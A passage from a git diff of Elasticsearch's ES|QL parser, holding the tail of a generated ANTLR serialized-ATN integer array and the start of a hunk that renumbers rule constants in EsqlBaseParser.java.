562, 1, 0, 0, 0, 132, 601, 1, 0, 0, 0, 134, 644, 1, 0, 0, 0, 136, 646, 1, 0, 0, 0, 138, 659, 1, 0, 0, 0, 140, 665, 1, 0, 0, 0, 142, 686, 1, 0, 0, 0, 144, 696, 1, 0, 0, 0, 146, 715, 1, 0, 0, 0, 148, 717, 1, 0, 0, 0, 150, 728, 1, 0, 0, 0, 152, 774, 1, 0, 0, 0, 154, 776, 1, 0, 0, 0, 156, 780, 1, 0, 0, 0, 158, 783, 1, 0, 0, 0, 160, 788, 1, 0, 0, 0, 162, 792, 1, 0, 0, 0, 164, 794, 1, 0, 0, 0, 166, 796, 1, 0, 0, 0, 168, 801, 1, 0, 0, 0, 170, 803, 1, 0, 0, 0, 172, 812, 1, 0, 0, 0, 174, 175, 3, 2, 1, 0, 175, 176, 5, 0, 0, 1, 176, 1, 1, 0, 0, 0, 177, 178, 6, 1, -1, 0, 178, 179, 3, 4, 2, 0, 179, 185, 1, 0, 0, 0, 180, 181, 10, 1, 0, 0, 181, 182, 5, 52, 0, 0, 182, 184, 3, 6, 3, 0, 183, 180, 1, 0, 0, 0, 184, 187, 1, 0, 0, 0, 185, 183, 1, 0, 0, 0, 185, 186, 1, 0, 0, 0, 186, 3, 1, 0, 0, 0, 187, 185, 1, 0, 0, 0, 188, 196, 3, 22, 11, 0, 189, 196, 3, 12, 6, 0, 190, 196, 3, 92, 46, 0, 191, 192, 4, 2, 1, 0, 192, 196, 3, 24, 12, 0, 193, 194, 4, 2, 2, 0, 194, 196, 3, 88, 44, 0, 195, 188, 1, 0, 0, 0, 195, 189, 1, 0, 0, 0, 195, 190, 1, 0, 0, 0, 195, 191, 1, 0, 0, 0, 195, 193, 1, 0, 0, 0, 196, 5, 1, 0, 0, 0, 197, 225, 3, 40, 20, 0, 198, 225, 3, 8, 4, 0, 199, 225, 3, 70, 35, 0, 200, 225, 3, 64, 32, 0, 201, 225, 3, 42, 21, 0, 202, 225, 3, 66, 33, 0, 203, 225, 3, 72, 36, 0, 204, 225, 3, 74, 37, 0, 205, 225, 3, 78, 39, 0, 206, 225, 3, 80, 40, 0, 207, 225, 3, 94, 47, 0, 208, 225, 3, 82, 41, 0, 209, 225, 3, 166, 83, 0, 210, 225, 3, 106, 53, 0, 211, 225, 3, 130, 65, 0, 212, 225, 3, 100, 50, 0, 213, 225, 3, 110, 55, 0, 214, 215, 4, 3, 3, 0, 215, 225, 3, 104, 52, 0, 216, 217, 4, 3, 4, 0, 217, 225, 3, 102, 51, 0, 218, 219, 4, 3, 5, 0, 219, 225, 3, 108, 54, 0, 220, 221, 4, 3, 6, 0, 221, 225, 3, 128, 64, 0, 222, 223, 4, 3, 7, 0, 223, 225, 3, 120, 60, 0, 224, 197, 1, 0, 0, 0, 224, 198, 1, 0, 0, 0, 224, 199, 1, 0, 0, 0, 224, 200, 1, 0, 0, 0, 224, 201, 1, 0, 0, 0, 224, 202, 1, 0, 0, 0, 224, 203, 1, 0, 0, 0, 224, 204, 1, 0, 0, 0, 224, 205, 1, 
0, 0, 0, 224, 206, 1, 0, 0, 0, 224, 207, 1, 0, 0, 0, 224, 208, 1, 0, 0, 0, 224, 209, 1, 0, 0, 0, 224, 210, 1, 0, 0, 0, 224, 211, 1, 0, 0, 0, 224, 212, 1, 0, 0, 0, 224, 213, 1, 0, 0, 0, 224, 214, 1, 0, 0, 0, 224, 216, 1, 0, 0, 0, 224, 218, 1, 0, 0, 0, 224, 220, 1, 0, 0, 0, 224, 222, 1, 0, 0, 0, 225, 7, 1, 0, 0, 0, 226, 227, 5, 16, 0, 0, 227, 228, 3, 132, 66, 0, 228, 9, 1, 0, 0, 0, 229, 230, 3, 54, 27, 0, 230, 11, 1, 0, 0, 0, 231, 232, 5, 12, 0, 0, 232, 233, 3, 14, 7, 0, 233, 13, 1, 0, 0, 0, 234, 239, 3, 16, 8, 0, 235, 236, 5, 62, 0, 0, 236, 238, 3, 16, 8, 0, 237, 235, 1, 0, 0, 0, 238, 241, 1, 0, 0, 0, 239, 237, 1, 0, 0, 0, 239, 240, 1, 0, 0, 0, 240, 15, 1, 0, 0, 0, 241, 239, 1, 0, 0, 0, 242, 243, 3, 48, 24, 0, 243, 244, 5, 58, 0, 0, 244, 246, 1, 0, 0, 0, 245, 242, 1, 0, 0, 0, 245, 246, 1, 0, 0, 0, 246, 247, 1, 0, 0, 0, 247, 248, 3, 132, 66, 0, 248, 17, 1, 0, 0, 0, 249, 254, 3, 20, 10, 0, 250, 251, 5, 62, 0, 0, 251, 253, 3, 20, 10, 0, 252, 250, 1, 0, 0, 0, 253, 256, 1, 0, 0, 0, 254, 252, 1, 0, 0, 0, 254, 255, 1, 0, 0, 0, 255, 19, 1, 0, 0, 0, 256, 254, 1, 0, 0, 0, 257, 260, 3, 48, 24, 0, 258, 259, 5, 58, 0, 0, 259, 261, 3, 132, 66, 0, 260, 258, 1, 0, 0, 0, 260, 261, 1, 0, 0, 0, 261, 21, 1, 0, 0, 0, 262, 263, 5, 19, 0, 0, 263, 264, 3, 26, 13, 0, 264, 23, 1, 0, 0, 0, 265, 266, 5, 20, 0, 0, 266, 267, 3, 26, 13, 0, 267, 25, 1, 0, 0, 0, 268, 273, 3, 28, 14, 0, 269, 270, 5, 62, 0, 0, 270, 272, 3, 28, 14, 0, 271, 269, 1, 0, 0, 0, 272, 275, 1, 0, 0, 0, 273, 271, 1, 0, 0, 0, 273, 274, 1, 0, 0, 0, 274, 277, 1, 0, 0, 0, 275, 273, 1, 0, 0, 0, 276, 278, 3, 38, 19, 0, 277, 276, 1, 0, 0, 0, 277, 278, 1, 0, 0, 0, 278, 27, 1, 0, 0, 0, 279, 280, 3, 30, 15, 0, 280, 281, 5, 61, 0, 0, 281, 282, 3, 34, 17, 0, 282, 289, 1, 0, 0, 0, 283, 284, 3, 34, 17, 0, 284, 285, 5, 60, 0, 0, 285, 286, 3, 32, 16, 0, 286, 289, 1, 0, 0, 0, 287, 289, 3, 36, 18, 0, 288, 279, 1, 0, 0, 0, 288, 283, 1, 0, 0, 0, 288, 287, 1, 0, 0, 0, 289, 29, 1, 0, 0, 0, 290, 291, 5, 107, 0, 0, 291, 31, 1, 0, 0, 0, 292, 293, 5, 107, 0, 0, 293, 33, 1, 0, 0, 0, 294, 295, 5, 107, 0, 0, 295, 35, 1, 0, 0, 0, 296, 297, 7, 0, 0, 0, 297, 37, 1, 0, 0, 0, 298, 299, 5, 106, 0, 0, 299, 304, 5, 107, 0, 0, 300, 301, 5, 62, 0, 0, 301, 303, 5, 107, 0, 0, 302, 300, 1, 0, 0, 0, 303, 306, 1, 0, 0, 0, 304, 302, 1, 0, 0, 0, 304, 305, 1, 0, 0, 0, 305, 39, 1, 0, 0, 0, 306, 304, 1, 0, 0, 0, 307, 308, 5, 9, 0, 0, 308, 309, 3, 14, 7, 0, 309, 41, 1, 0, 0, 0, 310, 312, 5, 15, 0, 0, 311, 313, 3, 44, 22, 0, 312, 311, 1, 0, 0, 0, 312, 313, 1, 0, 0, 0, 313, 316, 1, 0, 0, 0, 314, 315, 5, 59, 0, 0, 315, 317, 3, 14, 7, 0, 316, 314, 1, 0, 0, 0, 316, 317, 1, 0, 0, 0, 317, 43, 1, 0, 0, 0, 318, 323, 3, 46, 23, 0, 319, 320, 5, 62, 0, 0, 320, 322, 3, 46, 23, 0, 321, 319, 1, 0, 0, 0, 322, 325, 1, 0, 0, 0, 323, 321, 1, 0, 0, 0, 323, 324, 1, 0, 0, 0, 324, 45, 1, 0, 0, 0, 325, 323, 1, 0, 0, 0, 326, 329, 3, 16, 8, 0, 327, 328, 5, 16, 0, 0, 328, 330, 3, 132, 66, 0, 329, 327, 1, 0, 0, 0, 329, 330, 1, 0, 0, 0, 330, 47, 1, 0, 0, 0, 331, 336, 3, 62, 31, 0, 332, 333, 5, 64, 0, 0, 333, 335, 3, 62, 31, 0, 334, 332, 1, 0, 0, 0, 335, 338, 1, 0, 0, 0, 336, 334, 1, 0, 0, 0, 336, 337, 1, 0, 0, 0, 337, 49, 1, 0, 0, 0, 338, 336, 1, 0, 0, 0, 339, 344, 3, 56, 28, 0, 340, 341, 5, 64, 0, 0, 341, 343, 3, 56, 28, 0, 342, 340, 1, 0, 0, 0, 343, 346, 1, 0, 0, 0, 344, 342, 1, 0, 0, 0, 344, 345, 1, 0, 0, 0, 345, 51, 1, 0, 0, 0, 346, 344, 1, 0, 0, 0, 347, 352, 3, 50, 25, 0, 348, 349, 5, 62, 0, 0, 349, 351, 3, 50, 25, 0, 350, 348, 1, 0, 0, 0, 351, 354, 1, 0, 0, 0, 352, 350, 1, 0, 0, 0, 352, 353, 1, 0, 0, 0, 353, 53, 1, 0, 0, 
0, 354, 352, 1, 0, 0, 0, 355, 356, 7, 1, 0, 0, 356, 55, 1, 0, 0, 0, 357, 361, 5, 128, 0, 0, 358, 361, 3, 58, 29, 0, 359, 361, 3, 60, 30, 0, 360, 357, 1, 0, 0, 0, 360, 358, 1, 0, 0, 0, 360, 359, 1, 0, 0, 0, 361, 57, 1, 0, 0, 0, 362, 365, 5, 76, 0, 0, 363, 365, 5, 95, 0, 0, 364, 362, 1, 0, 0, 0, 364, 363, 1, 0, 0, 0, 365, 59, 1, 0, 0, 0, 366, 369, 5, 94, 0, 0, 367, 369, 5, 96, 0, 0, 368, 366, 1, 0, 0, 0, 368, 367, 1, 0, 0, 0, 369, 61, 1, 0, 0, 0, 370, 374, 3, 54, 27, 0, 371, 374, 3, 58, 29, 0, 372, 374, 3, 60, 30, 0, 373, 370, 1, 0, 0, 0, 373, 371, 1, 0, 0, 0, 373, 372, 1, 0, 0, 0, 374, 63, 1, 0, 0, 0, 375, 376, 5, 11, 0, 0, 376, 377, 3, 152, 76, 0, 377, 65, 1, 0, 0, 0, 378, 379, 5, 14, 0, 0, 379, 384, 3, 68, 34, 0, 380, 381, 5, 62, 0, 0, 381, 383, 3, 68, 34, 0, 382, 380, 1, 0, 0, 0, 383, 386, 1, 0, 0, 0, 384, 382, 1, 0, 0, 0, 384, 385, 1, 0, 0, 0, 385, 67, 1, 0, 0, 0, 386, 384, 1, 0, 0, 0, 387, 389, 3, 132, 66, 0, 388, 390, 7, 2, 0, 0, 389, 388, 1, 0, 0, 0, 389, 390, 1, 0, 0, 0, 390, 393, 1, 0, 0, 0, 391, 392, 5, 73, 0, 0, 392, 394, 7, 3, 0, 0, 393, 391, 1, 0, 0, 0, 393, 394, 1, 0, 0, 0, 394, 69, 1, 0, 0, 0, 395, 396, 5, 29, 0, 0, 396, 397, 3, 52, 26, 0, 397, 71, 1, 0, 0, 0, 398, 399, 5, 28, 0, 0, 399, 400, 3, 52, 26, 0, 400, 73, 1, 0, 0, 0, 401, 402, 5, 32, 0, 0, 402, 407, 3, 76, 38, 0, 403, 404, 5, 62, 0, 0, 404, 406, 3, 76, 38, 0, 405, 403, 1, 0, 0, 0, 406, 409, 1, 0, 0, 0, 407, 405, 1, 0, 0, 0, 407, 408, 1, 0, 0, 0, 408, 75, 1, 0, 0, 0, 409, 407, 1, 0, 0, 0, 410, 411, 3, 50, 25, 0, 411, 412, 5, 132, 0, 0, 412, 413, 3, 50, 25, 0, 413, 419, 1, 0, 0, 0, 414, 415, 3, 50, 25, 0, 415, 416, 5, 58, 0, 0, 416, 417, 3, 50, 25, 0, 417, 419, 1, 0, 0, 0, 418, 410, 1, 0, 0, 0, 418, 414, 1, 0, 0, 0, 419, 77, 1, 0, 0, 0, 420, 421, 5, 8, 0, 0, 421, 422, 3, 142, 71, 0, 422, 424, 3, 162, 81, 0, 423, 425, 3, 84, 42, 0, 424, 423, 1, 0, 0, 0, 424, 425, 1, 0, 0, 0, 425, 79, 1, 0, 0, 0, 426, 427, 5, 10, 0, 0, 427, 428, 3, 142, 71, 0, 428, 429, 3, 162, 81, 0, 429, 81, 1, 0, 0, 0, 430, 431, 5, 27, 0, 0, 431, 432, 3, 48, 24, 0, 432, 83, 1, 0, 0, 0, 433, 438, 3, 86, 43, 0, 434, 435, 5, 62, 0, 0, 435, 437, 3, 86, 43, 0, 436, 434, 1, 0, 0, 0, 437, 440, 1, 0, 0, 0, 438, 436, 1, 0, 0, 0, 438, 439, 1, 0, 0, 0, 439, 85, 1, 0, 0, 0, 440, 438, 1, 0, 0, 0, 441, 442, 3, 54, 27, 0, 442, 443, 5, 58, 0, 0, 443, 444, 3, 152, 76, 0, 444, 87, 1, 0, 0, 0, 445, 446, 5, 6, 0, 0, 446, 447, 3, 90, 45, 0, 447, 89, 1, 0, 0, 0, 448, 449, 5, 99, 0, 0, 449, 450, 3, 2, 1, 0, 450, 451, 5, 100, 0, 0, 451, 91, 1, 0, 0, 0, 452, 453, 5, 33, 0, 0, 453, 454, 5, 136, 0, 0, 454, 93, 1, 0, 0, 0, 455, 456, 5, 5, 0, 0, 456, 459, 3, 96, 48, 0, 457, 458, 5, 74, 0, 0, 458, 460, 3, 50, 25, 0, 459, 457, 1, 0, 0, 0, 459, 460, 1, 0, 0, 0, 460, 470, 1, 0, 0, 0, 461, 462, 5, 79, 0, 0, 462, 467, 3, 98, 49, 0, 463, 464, 5, 62, 0, 0, 464, 466, 3, 98, 49, 0, 465, 463, 1, 0, 0, 0, 466, 469, 1, 0, 0, 0, 467, 465, 1, 0, 0, 0, 467, 468, 1, 0, 0, 0, 468, 471, 1, 0, 0, 0, 469, 467, 1, 0, 0, 0, 470, 461, 1, 0, 0, 0, 470, 471, 1, 0, 0, 0, 471, 95, 1, 0, 0, 0, 472, 473, 7, 4, 0, 0, 473, 97, 1, 0, 0, 0, 474, 475, 3, 50, 25, 0, 475, 476, 5, 58, 0, 0, 476, 478, 1, 0, 0, 0, 477, 474, 1, 0, 0, 0, 477, 478, 1, 0, 0, 0, 478, 479, 1, 0, 0, 0, 479, 480, 3, 50, 25, 0, 480, 99, 1, 0, 0, 0, 481, 482, 5, 13, 0, 0, 482, 483, 3, 152, 76, 0, 483, 101, 1, 0, 0, 0, 484, 485, 5, 26, 0, 0, 485, 486, 3, 28, 14, 0, 486, 487, 5, 74, 0, 0, 487, 488, 3, 52, 26, 0, 488, 103, 1, 0, 0, 0, 489, 490, 5, 17, 0, 0, 490, 493, 3, 44, 22, 0, 491, 492, 5, 59, 0, 0, 492, 494, 3, 14, 7, 0, 493, 491, 1, 0, 0, 0, 
493, 494, 1, 0, 0, 0, 494, 105, 1, 0, 0, 0, 495, 496, 5, 4, 0, 0, 496, 499, 3, 48, 24, 0, 497, 498, 5, 74, 0, 0, 498, 500, 3, 48, 24, 0, 499, 497, 1, 0, 0, 0, 499, 500, 1, 0, 0, 0, 500, 506, 1, 0, 0, 0, 501, 502, 5, 132, 0, 0, 502, 503, 3, 48, 24, 0, 503, 504, 5, 62, 0, 0, 504, 505, 3, 48, 24, 0, 505, 507, 1, 0, 0, 0, 506, 501, 1, 0, 0, 0, 506, 507, 1, 0, 0, 0, 507, 107, 1, 0, 0, 0, 508, 509, 5, 30, 0, 0, 509, 510, 3, 52, 26, 0, 510, 109, 1, 0, 0, 0, 511, 512, 5, 21, 0, 0, 512, 513, 3, 112, 56, 0, 513, 111, 1, 0, 0, 0, 514, 516, 3, 114, 57, 0, 515, 514, 1, 0, 0, 0, 516, 517, 1, 0, 0, 0, 517, 515, 1, 0, 0, 0, 517, 518, 1, 0, 0, 0, 518, 113, 1, 0, 0, 0, 519, 520, 5, 99, 0, 0, 520, 521, 3, 116, 58, 0, 521, 522, 5, 100, 0, 0, 522, 115, 1, 0, 0, 0, 523, 524, 6, 58, -1, 0, 524, 525, 3, 118, 59, 0, 525, 531, 1, 0, 0, 0, 526, 527, 10, 1, 0, 0, 527, 528, 5, 52, 0, 0, 528, 530, 3, 118, 59, 0, 529, 526, 1, 0, 0, 0, 530, 533, 1, 0, 0, 0, 531, 529, 1, 0, 0, 0, 531, 532, 1, 0, 0, 0, 532, 117, 1, 0, 0, 0, 533, 531, 1, 0, 0, 0, 534, 535, 3, 6, 3, 0, 535, 119, 1, 0, 0, 0, 536, 537, 5, 31, 0, 0, 537, 121, 1, 0, 0, 0, 538, 543, 3, 124, 62, 0, 539, 540, 5, 62, 0, 0, 540, 542, 3, 124, 62, 0, 541, 539, 1, 0, 0, 0, 542, 545, 1, 0, 0, 0, 543, 541, 1, 0, 0, 0, 543, 544, 1, 0, 0, 0, 544, 123, 1, 0, 0, 0, 545, 543, 1, 0, 0, 0, 546, 547, 3, 54, 27, 0, 547, 548, 5, 58, 0, 0, 548, 549, 3, 126, 63, 0, 549, 125, 1, 0, 0, 0, 550, 553, 3, 152, 76, 0, 551, 553, 3, 54, 27, 0, 552, 550, 1, 0, 0, 0, 552, 551, 1, 0, 0, 0, 553, 127, 1, 0, 0, 0, 554, 555, 5, 18, 0, 0, 555, 556, 3, 152, 76, 0, 556, 557, 5, 74, 0, 0, 557, 560, 3, 18, 9, 0, 558, 559, 5, 79, 0, 0, 559, 561, 3, 122, 61, 0, 560, 558, 1, 0, 0, 0, 560, 561, 1, 0, 0, 0, 561, 129, 1, 0, 0, 0, 562, 566, 5, 7, 0, 0, 563, 564, 3, 48, 24, 0, 564, 565, 5, 58, 0, 0, 565, 567, 1, 0, 0, 0, 566, 563, 1, 0, 0, 0, 566, 567, 1, 0, 0, 0, 567, 568, 1, 0, 0, 0, 568, 569, 3, 142, 71, 0, 569, 570, 5, 79, 0, 0, 570, 571, 3, 62, 31, 0, 571, 131, 1, 0, 0, 0, 572, 573, 6, 66, -1, 0, 573, 574, 5, 71, 0, 0, 574, 602, 3, 132, 66, 8, 575, 602, 3, 138, 69, 0, 576, 602, 3, 134, 67, 0, 577, 579, 3, 138, 69, 0, 578, 580, 5, 71, 0, 0, 579, 578, 1, 0, 0, 0, 579, 580, 1, 0, 0, 0, 580, 581, 1, 0, 0, 0, 581, 582, 5, 67, 0, 0, 582, 583, 5, 99, 0, 0, 583, 588, 3, 138, 69, 0, 584, 585, 5, 62, 0, 0, 585, 587, 3, 138, 69, 0, 586, 584, 1, 0, 0, 0, 587, 590, 1, 0, 0, 0, 588, 586, 1, 0, 0, 0, 588, 589, 1, 0, 0, 0, 589, 591, 1, 0, 0, 0, 590, 588, 1, 0, 0, 0, 591, 592, 5, 100, 0, 0, 592, 602, 1, 0, 0, 0, 593, 594, 3, 138, 69, 0, 594, 596, 5, 68, 0, 0, 595, 597, 5, 71, 0, 0, 596, 595, 1, 0, 0, 0, 596, 597, 1, 0, 0, 0, 597, 598, 1, 0, 0, 0, 598, 599, 5, 72, 0, 0, 599, 602, 1, 0, 0, 0, 600, 602, 3, 136, 68, 0, 601, 572, 1, 0, 0, 0, 601, 575, 1, 0, 0, 0, 601, 576, 1, 0, 0, 0, 601, 577, 1, 0, 0, 0, 601, 593, 1, 0, 0, 0, 601, 600, 1, 0, 0, 0, 602, 611, 1, 0, 0, 0, 603, 604, 10, 5, 0, 0, 604, 605, 5, 56, 0, 0, 605, 610, 3, 132, 66, 6, 606, 607, 10, 4, 0, 0, 607, 608, 5, 75, 0, 0, 608, 610, 3, 132, 66, 5, 609, 603, 1, 0, 0, 0, 609, 606, 1, 0, 0, 0, 610, 613, 1, 0, 0, 0, 611, 609, 1, 0, 0, 0, 611, 612, 1, 0, 0, 0, 612, 133, 1, 0, 0, 0, 613, 611, 1, 0, 0, 0, 614, 616, 3, 138, 69, 0, 615, 617, 5, 71, 0, 0, 616, 615, 1, 0, 0, 0, 616, 617, 1, 0, 0, 0, 617, 618, 1, 0, 0, 0, 618, 619, 5, 70, 0, 0, 619, 620, 3, 162, 81, 0, 620, 645, 1, 0, 0, 0, 621, 623, 3, 138, 69, 0, 622, 624, 5, 71, 0, 0, 623, 622, 1, 0, 0, 0, 623, 624, 1, 0, 0, 0, 624, 625, 1, 0, 0, 0, 625, 626, 5, 77, 0, 0, 626, 627, 3, 162, 81, 0, 627, 645, 1, 0, 0, 0, 628, 
630, 3, 138, 69, 0, 629, 631, 5, 71, 0, 0, 630, 629, 1, 0, 0, 0, 630, 631, 1, 0, 0, 0, 631, 632, 1, 0, 0, 0, 632, 633, 5, 70, 0, 0, 633, 634, 5, 99, 0, 0, 634, 639, 3, 162, 81, 0, 635, 636, 5, 62, 0, 0, 636, 638, 3, 162, 81, 0, 637, 635, 1, 0, 0, 0, 638, 641, 1, 0, 0, 0, 639, 637, 1, 0, 0, 0, 639, 640, 1, 0, 0, 0, 640, 642, 1, 0, 0, 0, 641, 639, 1, 0, 0, 0, 642, 643, 5, 100, 0, 0, 643, 645, 1, 0, 0, 0, 644, 614, 1, 0, 0, 0, 644, 621, 1, 0, 0, 0, 644, 628, 1, 0, 0, 0, 645, 135, 1, 0, 0, 0, 646, 649, 3, 48, 24, 0, 647, 648, 5, 60, 0, 0, 648, 650, 3, 10, 5, 0, 649, 647, 1, 0, 0, 0, 649, 650, 1, 0, 0, 0, 650, 651, 1, 0, 0, 0, 651, 652, 5, 61, 0, 0, 652, 653, 3, 152, 76, 0, 653, 137, 1, 0, 0, 0, 654, 660, 3, 140, 70, 0, 655, 656, 3, 140, 70, 0, 656, 657, 3, 164, 82, 0, 657, 658, 3, 140, 70, 0, 658, 660, 1, 0, 0, 0, 659, 654, 1, 0, 0, 0, 659, 655, 1, 0, 0, 0, 660, 139, 1, 0, 0, 0, 661, 662, 6, 70, -1, 0, 662, 666, 3, 142, 71, 0, 663, 664, 7, 5, 0, 0, 664, 666, 3, 140, 70, 3, 665, 661, 1, 0, 0, 0, 665, 663, 1, 0, 0, 0, 666, 675, 1, 0, 0, 0, 667, 668, 10, 2, 0, 0, 668, 669, 7, 6, 0, 0, 669, 674, 3, 140, 70, 3, 670, 671, 10, 1, 0, 0, 671, 672, 7, 5, 0, 0, 672, 674, 3, 140, 70, 2, 673, 667, 1, 0, 0, 0, 673, 670, 1, 0, 0, 0, 674, 677, 1, 0, 0, 0, 675, 673, 1, 0, 0, 0, 675, 676, 1, 0, 0, 0, 676, 141, 1, 0, 0, 0, 677, 675, 1, 0, 0, 0, 678, 679, 6, 71, -1, 0, 679, 687, 3, 152, 76, 0, 680, 687, 3, 48, 24, 0, 681, 687, 3, 144, 72, 0, 682, 683, 5, 99, 0, 0, 683, 684, 3, 132, 66, 0, 684, 685, 5, 100, 0, 0, 685, 687, 1, 0, 0, 0, 686, 678, 1, 0, 0, 0, 686, 680, 1, 0, 0, 0, 686, 681, 1, 0, 0, 0, 686, 682, 1, 0, 0, 0, 687, 693, 1, 0, 0, 0, 688, 689, 10, 1, 0, 0, 689, 690, 5, 60, 0, 0, 690, 692, 3, 10, 5, 0, 691, 688, 1, 0, 0, 0, 692, 695, 1, 0, 0, 0, 693, 691, 1, 0, 0, 0, 693, 694, 1, 0, 0, 0, 694, 143, 1, 0, 0, 0, 695, 693, 1, 0, 0, 0, 696, 697, 3, 146, 73, 0, 697, 711, 5, 99, 0, 0, 698, 712, 5, 89, 0, 0, 699, 704, 3, 132, 66, 0, 700, 701, 5, 62, 0, 0, 701, 703, 3, 132, 66, 0, 702, 700, 1, 0, 0, 0, 703, 706, 1, 0, 0, 0, 704, 702, 1, 0, 0, 0, 704, 705, 1, 0, 0, 0, 705, 709, 1, 0, 0, 0, 706, 704, 1, 0, 0, 0, 707, 708, 5, 62, 0, 0, 708, 710, 3, 148, 74, 0, 709, 707, 1, 0, 0, 0, 709, 710, 1, 0, 0, 0, 710, 712, 1, 0, 0, 0, 711, 698, 1, 0, 0, 0, 711, 699, 1, 0, 0, 0, 711, 712, 1, 0, 0, 0, 712, 713, 1, 0, 0, 0, 713, 714, 5, 100, 0, 0, 714, 145, 1, 0, 0, 0, 715, 716, 3, 62, 31, 0, 716, 147, 1, 0, 0, 0, 717, 718, 5, 92, 0, 0, 718, 723, 3, 150, 75, 0, 719, 720, 5, 62, 0, 0, 720, 722, 3, 150, 75, 0, 721, 719, 1, 0, 0, 0, 722, 725, 1, 0, 0, 0, 723, 721, 1, 0, 0, 0, 723, 724, 1, 0, 0, 0, 724, 726, 1, 0, 0, 0, 725, 723, 1, 0, 0, 0, 726, 727, 5, 93, 0, 0, 727, 149, 1, 0, 0, 0, 728, 729, 3, 162, 81, 0, 729, 730, 5, 61, 0, 0, 730, 731, 3, 152, 76, 0, 731, 151, 1, 0, 0, 0, 732, 775, 5, 72, 0, 0, 733, 734, 3, 160, 80, 0, 734, 735, 5, 101, 0, 0, 735, 775, 1, 0, 0, 0, 736, 775, 3, 158, 79, 0, 737, 775, 3, 160, 80, 0, 738, 775, 3, 154, 77, 0, 739, 775, 3, 58, 29, 0, 740, 775, 3, 162, 81, 0, 741, 742, 5, 97, 0, 0, 742, 747, 3, 156, 78, 0, 743, 744, 5, 62, 0, 0, 744, 746, 3, 156, 78, 0, 745, 743, 1, 0, 0, 0, 746, 749, 1, 0, 0, 0, 747, 745, 1, 0, 0, 0, 747, 748, 1, 0, 0, 0, 748, 750, 1, 0, 0, 0, 749, 747, 1, 0, 0, 0, 750, 751, 5, 98, 0, 0, 751, 775, 1, 0, 0, 0, 752, 753, 5, 97, 0, 0, 753, 758, 3, 154, 77, 0, 754, 755, 5, 62, 0, 0, 755, 757, 3, 154, 77, 0, 756, 754, 1, 0, 0, 0, 757, 760, 1, 0, 0, 0, 758, 756, 1, 0, 0, 0, 758, 759, 1, 0, 0, 0, 759, 761, 1, 0, 0, 0, 760, 758, 1, 0, 0, 0, 761, 762, 5, 98, 0, 0, 762, 775, 1, 0, 0, 0, 763, 
764, 5, 97, 0, 0, 764, 769, 3, 162, 81, 0, 765, 766, 5, 62, 0, 0, 766, 768, 3, 162, 81, 0, 767, 765, 1, 0, 0, 0, 768, 771, 1, 0, 0, 0, 769, 767, 1, 0, 0, 0, 769, 770, 1, 0, 0, 0, 770, 772, 1, 0, 0, 0, 771, 769, 1, 0, 0, 0, 772, 773, 5, 98, 0, 0, 773, 775, 1, 0, 0, 0, 774, 732, 1, 0, 0, 0, 774, 733, 1, 0, 0, 0, 774, 736, 1, 0, 0, 0, 774, 737, 1, 0, 0, 0, 774, 738, 1, 0, 0, 0, 774, 739, 1, 0, 0, 0, 774, 740, 1, 0, 0, 0, 774, 741, 1, 0, 0, 0, 774, 752, 1, 0, 0, 0, 774, 763, 1, 0, 0, 0, 775, 153, 1, 0, 0, 0, 776, 777, 7, 7, 0, 0, 777, 155, 1, 0, 0, 0, 778, 781, 3, 158, 79, 0, 779, 781, 3, 160, 80, 0, 780, 778, 1, 0, 0, 0, 780, 779, 1, 0, 0, 0, 781, 157, 1, 0, 0, 0, 782, 784, 7, 5, 0, 0, 783, 782, 1, 0, 0, 0, 783, 784, 1, 0, 0, 0, 784, 785, 1, 0, 0, 0, 785, 786, 5, 55, 0, 0, 786, 159, 1, 0, 0, 0, 787, 789, 7, 5, 0, 0, 788, 787, 1, 0, 0, 0, 788, 789, 1, 0, 0, 0, 789, 790, 1, 0, 0, 0, 790, 791, 5, 54, 0, 0, 791, 161, 1, 0, 0, 0, 792, 793, 5, 53, 0, 0, 793, 163, 1, 0, 0, 0, 794, 795, 7, 8, 0, 0, 795, 165, 1, 0, 0, 0, 796, 797, 7, 9, 0, 0, 797, 798, 5, 114, 0, 0, 798, 799, 3, 168, 84, 0, 799, 800, 3, 170, 85, 0, 800, 167, 1, 0, 0, 0, 801, 802, 3, 28, 14, 0, 802, 169, 1, 0, 0, 0, 803, 804, 5, 74, 0, 0, 804, 809, 3, 172, 86, 0, 805, 806, 5, 62, 0, 0, 806, 808, 3, 172, 86, 0, 807, 805, 1, 0, 0, 0, 808, 811, 1, 0, 0, 0, 809, 807, 1, 0, 0, 0, 809, 810, 1, 0, 0, 0, 810, 171, 1, 0, 0, 0, 811, 809, 1, 0, 0, 0, 812, 813, 3, 138, 69, 0, 813, 173, 1, 0, 0, 0, 72, 185, 195, 224, 239, 245, 254, 260, 273, 277, 288, 304, 312, 316, 323, 329, 336, 344, 352, 360, 364, 368, 373, 384, 389, 393, 407, 418, 424, 438, 459, 467, 470, 477, 493, 499, 506, 517, 531, 543, 552, 560, 566, 579, 588, 596, 601, 609, 611, 616, 623, 630, 639, 644, 649, 659, 665, 673, 675, 686, 693, 704, 709, 711, 723, 747, 758, 769, 774, 780, 783, 788, 809] \ No newline at end of file diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParser.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParser.java index 8f9a1477ef9ea..6dd6a15577139 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParser.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParser.java @@ -70,19 +70,19 @@ public class EsqlBaseParser extends ParserConfig { RULE_dissectCommand = 39, RULE_grokCommand = 40, RULE_mvExpandCommand = 41, RULE_commandOptions = 42, RULE_commandOption = 43, RULE_explainCommand = 44, RULE_subqueryExpression = 45, RULE_showCommand = 46, RULE_enrichCommand = 47, - RULE_enrichWithClause = 48, RULE_sampleCommand = 49, RULE_lookupCommand = 50, - RULE_inlinestatsCommand = 51, RULE_changePointCommand = 52, RULE_insistCommand = 53, - RULE_forkCommand = 54, RULE_forkSubQueries = 55, RULE_forkSubQuery = 56, - RULE_forkSubQueryCommand = 57, RULE_forkSubQueryProcessingCommand = 58, - RULE_rrfCommand = 59, RULE_inferenceCommandOptions = 60, RULE_inferenceCommandOption = 61, - RULE_inferenceCommandOptionValue = 62, RULE_rerankCommand = 63, RULE_completionCommand = 64, - RULE_booleanExpression = 65, RULE_regexBooleanExpression = 66, RULE_matchBooleanExpression = 67, - RULE_valueExpression = 68, RULE_operatorExpression = 69, RULE_primaryExpression = 70, - RULE_functionExpression = 71, RULE_functionName = 72, RULE_mapExpression = 73, - 